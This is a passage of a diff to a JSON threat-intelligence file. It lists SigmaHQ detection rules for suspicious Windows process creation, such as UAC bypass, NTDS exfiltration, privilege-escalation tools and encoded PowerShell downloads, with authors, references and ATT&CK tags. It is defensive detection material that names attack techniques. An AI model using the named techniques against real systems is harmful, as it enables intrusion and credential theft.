"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_susp_comb_methods.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "5b572dcf-254b-425c-a8c5-d9af6bea35a6", + "value": "Suspicious Xor PowerShell Command Line" + }, + { + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", + "value": "UAC Bypass Using MSConfig Token Modification - Process" + }, + { + "description": "Detects the execution of AdvancedRun utility", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_advancedrun.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", + "https://twitter.com/splinter_code/status/1483815103279603714", + "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_advancedrun.yml" + ], + "tags": "No established 
tags" + }, + "uuid": "d2b749ee-4225-417e-b20e-a8d2193cbb84", + "value": "Suspicious AdvancedRun Execution" + }, + { + "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/14", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_new_service_creation.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_new_service_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", + "value": "Suspicious New Service Creation" + }, + { + "description": "Detects a suspicious script executions in temporary folders or folders accessible by environment variables", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/91ba814a86ddedc7a9d546e26f912c541205b47a853d227756ab1334ade92c3f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "1228c958-e64e-4e71-92ad-7d429f4138ba", + "value": "Script Interpreter 
Execution From Suspicious Folder" + }, + { + "description": "Detects the PowerShell command lines with reversed strings", + "meta": { + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "creation_date": "2020/10/11", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://2019.offzone.moscow/ru/report/hunting-for-powershell-abuses/", + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=66", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", + "value": "Suspicious PowerShell Cmdline" + }, + { + "description": "Detects usage of hh.exe to execute/download remotely hosted .chm files.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_hh_chm_http.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md", + "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm_http.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.001" + ] + }, + "uuid": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", + "value": "HH.exe Remote CHM File Execution" + }, + { + "description": "Detects a command used by conti to exfiltrate NTDS", + "meta": { + "author": "Max Altgelt, Tobias 
Michalski", + "creation_date": "2021/08/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_malware_conti_7zip.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_7zip.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560" + ] + }, + "uuid": "aa92fd02-09f2-48b0-8a93-864813fb8f41", + "value": "Conti NTDS Exfiltration Command" + }, + { + "description": "Detects attempts to disable the Windows Firewall using PowerShell", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/14", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_firewall_disabled_via_powershell.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_firewall_disabled_via_powershell.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ] + }, + "uuid": "12f6b752-042d-483e-bf9c-915a6d06ad75", + "value": "Windows Firewall Disabled via PowerShell" + }, + { + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_invoke_obfuscation_var.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_var.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "27aec9c9-dbb0-4939-8422-1742242471d0", + "value": "Invoke-Obfuscation VAR+ Launcher" + }, + { + "description": "Detects a suspicious svchost process start", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/08/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_svchost.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_svchost.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.005" + ] + }, + "uuid": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", + "value": "Suspicious Svchost Process" + }, + { + "description": "Detects transferring files from system on a server bitstransfer Powershell cmdlets", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_bitstransfer.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bitstransfer.yml" ], "tags": [ "attack.exfiltration", - "attack.t1048" + "attack.persistence", + "attack.t1197" ] }, - "uuid": "99793437-3e16-439b-be0f-078782cf953d", - "value": "Tap Installer Execution" + "uuid": "cd5c8085-4070-4e22-908d-a5b3342deb74", + "value": "Suspicious Bitstransfer via PowerShell" + }, + { + "description": "Threat actors can use an older version of the auditpol binary available inside the NT 
resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "meta": { + "author": "Nasreddine Bencherchali @nas_bench", + "creation_date": "2021/12/18", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_nt_resource_kit_auditpol_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Windows%202000%20Resource%20Kit%20Tools/AuditPol", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_nt_resource_kit_auditpol_usage.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", + "value": "Suspicious NT Resource Kit Auditpol Usage" + }, + { + "description": "Detects code execution via the Windows Update client (wuauclt)", + "meta": { + "author": "FPT.EagleEye Team", + "creation_date": "2020/10/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_wuauclt.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://dtm.uk/wuauclt/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wuauclt.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.execution", + "attack.t1105", + "attack.t1218" + ] + }, + "uuid": "d7825193-b70a-48a4-b992-8b5b3015cc11", + "value": "Windows Update Client LOLBIN" + }, + { + "description": "Detects usage of the Sharp Chisel via the commandline arguments", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_sharp_chisel_usage.yml", + "level": "high", + 
"logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/shantanu561993/SharpChisel", + "https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090.001" + ] + }, + "uuid": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", + "value": "SharpChisel Usage" + }, + { + "description": "Detects the import of the specified file to the registry with regedit.exe.", + "meta": { + "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "creation_date": "2020/10/07", + "falsepositive": [ + "Legitimate import of keys", + "Evernote" + ], + "filename": "proc_creation_win_regedit_import_keys.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml" + ], + "tags": [ + "attack.t1112", + "attack.defense_evasion" + ] + }, + "uuid": "73bba97f-a82d-42ce-b315-9182e76c57b1", + "value": "Imports Registry Key From a File" + }, + { + "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", + "meta": { + "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", + "creation_date": "2019/02/22", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_mshta_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997", + "http://blog.sevagas.com/?Hacking-around-HTA-files", + "https://twitter.com/mattifestation/status/1326228491302563846", + "https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script", + "https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshta_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.t1218.005", + "attack.execution", + "attack.t1059.007", + "cve.2020.1599" + ] + }, + "uuid": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", + "value": "MSHTA Suspicious Execution 01" + }, + { + "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/25", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_public_folder_parent.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/blackbyte-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_public_folder_parent.yml" + ], + "tags": "No established tags" + }, + "uuid": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", + "value": "Parent in Public Folder Suspicious Process" + }, + { + "description": "Detects the use of SharpUp, a tool for local privilege escalation", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sharpup.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/GhostPack/SharpUp", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sharpup.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1615", + "attack.t1569.002", + "attack.t1574.005" + ] + }, + "uuid": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", + "value": "SharpUp PrivEsc Tool" + }, + { + "description": "Detects dump of credentials in VeeamBackup dbo", + "meta": { + "author": "frack113", + "creation_date": "2021/12/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sqlcmd_veeam_dump.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://forums.veeam.com/veeam-backup-replication-f2/recover-esxi-password-in-veeam-t34630.html", + "https://thedfirreport.com/2021/12/13/diavol-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml" + ], + "tags": [ + "attack.collection", + "attack.t1005" + ] + }, + "uuid": "b57ba453-b384-4ab9-9f40-1038086b4e53", + "value": "VeeamBackup Database Credentials Dump" + }, + { + "description": "Uninstall an application with wmic", + "meta": { + "author": "frac113", + "creation_date": "2022/01/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wmic_remove_application.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-10---application-uninstall-using-wmic", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remove_application.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "b53317a0-8acf-4fd1-8de8-a5401e776b96", + "value": "WMI Uninstall An Application" + }, + { + "description": "The OpenWith.exe executes other binary", + "meta": { + "author": 
"Beyu Denis, oscd.community (rule), @harr0ey (idea)", + "creation_date": "2019/10/12", + "falsepositive": [ + "Legitimate use of OpenWith.exe by legitimate user" + ], + "filename": "proc_creation_win_susp_openwith.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Openwith.yml", + "https://twitter.com/harr0ey/status/991670870384021504", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_openwith.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", + "value": "OpenWith.exe Executes Specified Binary" + }, + { + "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/01", + "falsepositive": [ + "Some fasle positives could occure with the admin or guest account. It depends on the scripts being used by the admins in your env. 
If you experience a lot of FP you could reduce the level to medium" + ], + "filename": "proc_creation_win_net_default_accounts_manipulation.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", + "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", + "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_default_accounts_manipulation.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ] + }, + "uuid": "5b768e71-86f2-4879-b448-81061cbae951", + "value": "Suspicious Manipulation Of Default Accounts" + }, + { + "description": "load malicious registered COM objects", + "meta": { + "author": "frack113", + "creation_date": "2022/02/13", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_rundll32_registered_com_objects.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md", + "https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_registered_com_objects.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.015" + ] + }, + "uuid": "f1edd233-30b5-4823-9e6a-c4171b24d316", + "value": "Rundll32 Registered COM Objects" + }, + { + "description": "Detects usage of the copy command to copy files with the .dmp extensions from a remote share", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/27", + 
"falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_copy_dmp_from_share.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_copy_dmp_from_share.yml" + ], + "tags": [ + "attack.credential_access" + ] + }, + "uuid": "044ba588-dff4-4918-9808-3f95e8160606", + "value": "Copy DMP Files From Share" + }, + { + "description": "Detects suspicious Splwow64.exe process without any command line parameters", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_splwow64.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/sbousseaden/status/1429401053229891590?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_splwow64.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", + "value": "Suspicious Splwow64 Without Params" + }, + { + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2022/08/05", + "falsepositive": [ + "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." 
+ ], + "filename": "proc_creation_win_ntfs_short_name_use_cli.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", + "https://twitter.com/jonasLyk/status/1555914501802921984", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795", + "value": "Use NTFS Short Name in Command Line" + }, + { + "description": "Detects PowerShell script execution via input stream redirect", + "meta": { + "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", + "creation_date": "2020/10/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_run_powershell_script_from_input_stream.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Moriarty_Meng/status/984380793383370752", + "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Powershell.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_powershell_script_from_input_stream.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", + "value": "Run PowerShell Script from Redirected Input Stream" + }, + { + "description": "Detects execution of renamed client32.exe (NetSupport RAT) via Imphash, Product and OriginalFileName strings", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/19", + "falsepositive": [ + 
"Unknown" + ], + "filename": "proc_creation_win_renamed_netsupport_rat.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_netsupport_rat.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "0afbd410-de03-4078-8491-f132303cb67d", + "value": "Execution of Renamed NetSupport RAT" + }, + { + "description": "Detects Judgement Panda activity as described in Global Threat Report 2019 by Crowdstrike", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/02/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_judgement_panda_gtr19.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_judgement_panda_gtr19.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.g0010", + "attack.credential_access", + "attack.t1003.001", + "attack.exfiltration", + "attack.t1560.001" + ] + }, + "uuid": "03e2746e-2b31-42f1-ab7a-eb39365b2422", + "value": "Judgement Panda Exfil Activity" + }, + { + "description": "Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/12/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_ta505_dropper.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/ForensicITGuy/status/1334734244120309760", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ta505_dropper.yml" + ], + "tags": [ + 
"attack.execution", + "attack.g0092", + "attack.t1106" + ] + }, + "uuid": "18cf6cf0-39b0-4c22-9593-e244bdc9a2d4", + "value": "TA505 Dropper Load Pattern" + }, + { + "description": "Detects specific combinations of encoding methods in the PowerShell command lines", + "meta": { + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "creation_date": "2020/10/11", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_powershell_cmdline_specific_comb_methods.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_specific_comb_methods.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "cdf05894-89e7-4ead-b2b0-0a5f97a90f2f", + "value": "Encoded PowerShell Command Line" + }, + { + "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/26", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_hack_krbrelayup.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Dec0ne/KrbRelayUp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_krbrelayup.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" + ] + }, + "uuid": "12827a56-61a4-476a-a9cb-f3068f191073", + "value": "KrbRelayUp Hack Tool" + }, + { + "description": "Discovery of an installed Sysinternals Sysmon service using driver altitude (even if 
the name is changed).", + "meta": { + "author": "frack113", + "creation_date": "2021/12/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_findstr_385201.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-5---security-software-discovery---sysmon-service", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_findstr_385201.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1518.001" + ] + }, + "uuid": "37db85d1-b089-490a-a59a-c7b6f984f480", + "value": "Suspicious Findstr 385201 Execution" + }, + { + "description": "Detects tools and process executions as observed in a Greenbug campaign in May 2020", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/05/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_greenbug_may20.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_greenbug_may20.yml" + ], + "tags": [ + "attack.g0049", + "attack.execution", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1105", + "attack.defense_evasion", + "attack.t1036.005" + ] + }, + "uuid": "3711eee4-a808-4849-8a14-faf733da3612", + "value": "Greenbug Campaign Indicators" + }, + { + "description": "Adversaries may delete files left behind by the actions of their intrusion activity.\nMalware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\nRemoval of these files can occur 
during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/15", + "falsepositive": [ + "Legitimate scripts" + ], + "filename": "proc_creation_win_cmd_delete.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_delete.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ] + }, + "uuid": "379fa130-190e-4c3f-b7bc-6c8e834485f3", + "value": "Windows Cmd Delete File" + }, + { + "description": "Identifies usage of hh.exe executing recently modified .chm files.", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_hh_chm.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.001/T1218.001.md", + "https://eqllib.readthedocs.io/en/latest/analytics/b25aa548-7937-11e9-8f5c-d46d6d62a49e.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.001" + ] + }, + "uuid": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", + "value": "HH.exe Execution" + }, + { + "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/08/28", + "falsepositive": [ + "Unknown" + ], + "filename": 
